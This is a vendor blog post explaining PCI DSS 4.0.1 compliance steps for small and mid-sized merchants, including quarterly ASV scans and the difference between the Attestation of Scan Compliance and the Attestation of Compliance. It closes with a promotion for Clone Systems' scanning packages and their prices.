Your acquiring bank or payment processor said you need a quarterly AoSC and ASV scans… now what?

When your acquiring bank or payment processor tells you to produce proof of PCI compliance or risk losing your ability to accept cards, it is not an idle threat. Acquirers are contractually required to ensure their merchants stay compliant, and card brands can fine them up to $100,000 per month for non‑compliance. In turn, they pass those requirements down to you. With PCI DSS 4.0/4.0.1 fully enforceable since 31 March 2025, acquirers are tightening the screws, especially on e‑commerce merchants who use redirect or iframe payment pages. The introduction of quarterly external vulnerability scans for SAQ A merchants and the requirement to submit an Attestation of Scan Compliance (AoSC) after each passing scan have caught many merchants off guard.
This blog explains what your bank is really asking for: the AoSC, a quarterly document issued by your Approved Scanning Vendor (ASV), and why it differs from the Attestation of Compliance (AOC), the annual certification that you meet all PCI DSS requirements.
By understanding the difference and following a few concrete steps, you can satisfy your bank quickly and avoid unnecessary penalties.

This guide will walk you through what your acquirer is asking for, why it matters and how to satisfy these requirements fast without sacrificing security. It assumes you are a small or mid‑sized merchant rather than a large enterprise with a QSA on speed dial, but the same principles apply to any level.

Step 1 – Confirm your merchant level and SAQ type

PCI DSS assigns merchants to levels based on annual transaction volume. Level 2–4 merchants (those under six million transactions per year) must complete a Self‑Assessment Questionnaire annually and run quarterly ASV scans. Level 1 merchants must undergo a Report on Compliance (ROC) by a Qualified Security Assessor (QSA) and still run quarterly scans. Confirm which level you fall into by checking your annual card volume with your acquirer and then select the appropriate SAQ. For example, SAQ A covers fully outsourced payment pages, SAQ A‑EP covers partially outsourced e‑commerce, and SAQ D covers direct API integrations. Getting the SAQ wrong means you will either do unnecessary work or miss controls your assessor will catch.

Step 2 – Complete the SAQ or ROC

The SAQ is a series of yes/no questions that map to the 12 PCI DSS requirements. It covers topics such as installing network security controls, hardening system configurations, protecting cardholder data, vulnerability management, access control, monitoring and maintaining information‑security policies. Take the questions seriously. Answering “yes” means you have implemented the control and can prove it. If your merchant level requires a ROC, engage a QSA or Internal Security Assessor to perform the assessment and document evidence of compliance. The QSA’s report will serve as the basis for your AOC.

Step 3 – Schedule quarterly external vulnerability scans

Requirement 11.3 of PCI DSS mandates external vulnerability scans by an Approved Scanning Vendor at least once every three months. The PCI Security Standards Council added these scans to SAQ A in v4.x to combat increasing e‑skimming attacks. SecurityMetrics notes that SAQ A merchants now have 31 requirements instead of 24, and quarterly ASV scans became mandatory as soon as v3.2.1 was retired. Even if you fully outsource payments via a redirect or iframe, you must scan the web server that hosts the payment page because attackers have been exploiting these sites to divert traffic. Choose a PCI SSC–approved ASV from the council’s vendor list. During onboarding you will define the scope—include every public IP address and URL that routes to your environment; sampling is not permitted. Scans must run within a 90‑ to 92‑day window, and all high vulnerabilities must be remediated and rescanned until the report is clean. Failing to maintain four passing scans per year is grounds for non‑compliance.

Understanding AOC vs AoSC

There are two different attestation documents in the PCI world. The Attestation of Compliance (AOC) is your annual declaration that summarizes the results of your PCI DSS assessment. It is a signed, formal document that attests your organization meets the required security standards for handling payment card data. An AOC is concise and formally declares that your PCI audit results are accurate and that you are compliant.

The Attestation of Scan Compliance (AoSC), sometimes written as AOSC, is issued by your Approved Scanning Vendor after each passing quarterly external scan. It provides a summary cover sheet showing whether your internet‑facing assets met the PCI DSS external vulnerability scanning requirements. Your acquiring bank or payment processor will ask you to submit the AoSC along with the ASV scan report each quarter to prove you passed the quarterly compliance check. They may also request your AOC annually to verify your overall compliance status. Make sure you understand which document is being requested when you receive a notification.

Step 4 – Address vulnerabilities and document remediation

Scans are only the beginning. When an ASV report identifies high‑risk findings, correct them promptly. Typical issues include outdated web server software, misconfigured firewall rules and unpatched vulnerabilities. Once remediated, rerun the scan to demonstrate that the problem has been fixed; rescans are included in most ASV service fees. Keep records of remediation actions, as your assessor will expect proof that vulnerabilities were addressed and not just ignored. For e‑commerce merchants, consider implementing script‑integrity monitoring (PCI DSS requirements 6.4.3 and 11.6.1) to detect unauthorized modifications to your payment page.

Step 5 – Compile your Attestations

There are two attestation documents you will need:

• The Attestation of Scan Compliance (AoSC/AOSC) is issued by your Approved Scanning Vendor after you pass your quarterly external vulnerability scan. It shows whether your internet‑facing assets met the PCI DSS external scanning requirements and is required by your acquiring bank or payment processor each quarter.
• The Attestation of Compliance (AOC) is the formal declaration that you meet all applicable PCI DSS requirements. Once your SAQ or ROC is complete and your scans have passed, your assessor or a qualified executive signs the AOC. This annual document summarizes your PCI audit results and confirms you are PCI compliant.

Both documents must be sent to your acquiring bank or payment partners as part of your compliance validation. AOCs are valid for one year and must be renewed annually, while AoSCs are tied to each quarterly scan.

Step 6 – Submit your documentation to the acquirer

Once you have a clean ASV report, the associated AoSC and a signed AOC, send them to your acquiring bank or payment processor. The PCI SSC explains that merchants must submit their SAQ or ROC, the merchant attestation form (AOC) and their most recent quarterly ASV scan reports along with the AoSC to the acquirer. After your completed questionnaire, passing scan and submitted AoSC and AOC, your acquirer will issue a compliance certificate that you can present to business partners and customers. Keep copies of all submissions and confirm receipt. If your acquirer uses a compliance portal, upload your documents promptly. Do not assume that because you sent an email once, the bank considers you compliant.

Step 7 – Make compliance continuous

PCI DSS v4.0.1 shifts the mindset from annual checkboxes to continuous security. The AOC has to be renewed every 12 months, but the underlying activities occur more frequently. The standard now mandates quarterly vulnerability scans, continuous log review, semiannual access reviews and semiannual scoping exercises for service providers. Merchants using SAQ A‑EP or SAQ D must monitor every script on their payment pages (requirement 6.4.3), deploy change‑ and tamper‑detection mechanisms (requirement 11.6.1) and adopt multi‑factor authentication for all access to their cardholder data environment. Treat these tasks as ongoing operational practices, not emergencies triggered by a letter from your bank.

Why you are being asked now

If you have processed cards for years without anyone mentioning an AOC or ASV scans, the sudden attention can feel unfair. There are three reasons it is happening now:

1. New requirements for SAQ A merchants. PCI DSS v4.x added external ASV scans to SAQ A to combat a surge of e‑skimming attacks on merchant websites. SecurityMetrics points out that this change increased SAQ A requirements from 24 to 31 and took effect when version 3.2.1 was retired in March 2024.
2. Tighter enforcement by banks and card brands. Acquiring banks face fines of $5,000 to $100,000 per month for non‑compliance, so they demand proof that their merchants are compliant. Non‑compliant merchants can have their ability to process card transactions restricted or revoked. Rather than waiting for an annual audit, banks increasingly require quarterly evidence.
3. Shifting from point‑in‑time compliance to continuous security. The PCI council intentionally designed v4.0/4.0.1 to encourage continuous security. Requirements such as quarterly scans, continuous log review and script monitoring are meant to detect attacks between assessments. Expect these obligations to grow, not shrink, over time.

Beyond the basics: reducing scope and risk

Compliance is easier when there is less environment to secure. Consider using a Level 1‑compliant payment gateway that tokenizes cardholder data before it reaches your systems. Routing card data through a compliant service provider can remove large portions of your environment from PCI scope and simplify future assessments. If you continue hosting payment pages, implement file‑integrity monitoring, multi‑factor authentication and regular patching to mitigate the risk of compromise. Document your processes, train staff and audit third‑party providers to ensure they do not introduce vulnerabilities.

Final thoughts

Receiving an email from your acquiring bank demanding an AOC and quarterly ASV scans can feel like a threat. In reality, it is a necessary part of a payments ecosystem that is under constant attack. By understanding your obligations, conducting quarterly scans with an approved vendor, fixing vulnerabilities promptly, completing your SAQ or ROC and submitting your AOC on schedule, you will not only keep the card brands happy but also significantly reduce your risk of a costly data breach. Compliance is not a one‑time exercise; it is a discipline. Treat it like routine maintenance rather than a crisis and you will rarely have to worry about a suspension notice again. Clone Systems can help you through every step, from selecting an ASV to interpreting scan results and preparing your AOC. With the right process in place, the next call from your acquirer will be an easy one.

Get compliant today

The quarterly external scans described in this article generate an Attestation of Scan Compliance (AoSC) and set you up to produce your annual Attestation of Compliance (AOC).
If your compliance deadline is looming, Clone Systems can help you meet it fast. Their PCI ASV Certified Scans are delivered through a secure, single‑tenant web portal and require no software installation, so you can purchase online and start scanning immediately, getting your AoSC the same day. Packages start at $185 per year for scanning a single IP address or domain and scale to $625 per year for ten IPs or domains or $1,575 per year for twenty‑five IPs or domains. Every plan includes an online SAQ v4.0.1 wizard, certified ASV compliance reports, website trust seals and unlimited re‑scans until you pass.

Visit Clone Systems’ purchase page to select the package that fits your scope and obtain your AoSC today, so you are one step closer to your AOC. https://www.clone-systems.com/purchase-pci-compliance-scanning/